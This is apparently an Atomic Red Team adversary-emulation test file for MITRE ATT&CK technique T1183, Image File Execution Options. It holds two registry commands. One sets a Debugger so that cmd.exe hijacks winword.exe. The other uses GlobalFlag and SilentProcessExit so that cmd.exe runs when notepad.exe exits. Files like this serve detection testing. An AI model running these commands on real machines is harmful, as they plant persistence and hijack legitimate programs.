Carrie Roberts
1bfefdacfc
* provide elevation_required attribute * provide elevation_required attribute * provide elevation_required attribute
50 lines
1.4 KiB
YAML
50 lines
1.4 KiB
YAML
---
|
|
attack_technique: T1183
|
|
display_name: Image File Execution Options
|
|
|
|
atomic_tests:
|
|
- name: IFEO Add Debugger
|
|
description: |
|
|
Leverage Global Flags Settings
|
|
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
target_binary:
|
|
description: Binary To Attach To
|
|
type: Path
|
|
default: winword.exe
|
|
payload_binary:
|
|
description: Binary To Execute
|
|
type: Path
|
|
default: cmd.exe
|
|
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: true
|
|
command: |
|
|
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
|
|
|
|
- name: IFEO Global Flags
|
|
description: |
|
|
Leverage Global Flags Settings
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
target_binary:
|
|
description: Binary To Attach To
|
|
type: Path
|
|
default: notepad.exe
|
|
payload_binary:
|
|
description: Binary To Execute
|
|
type: Path
|
|
default: cmd.exe
|
|
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: true
|
|
command: |
|
|
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
|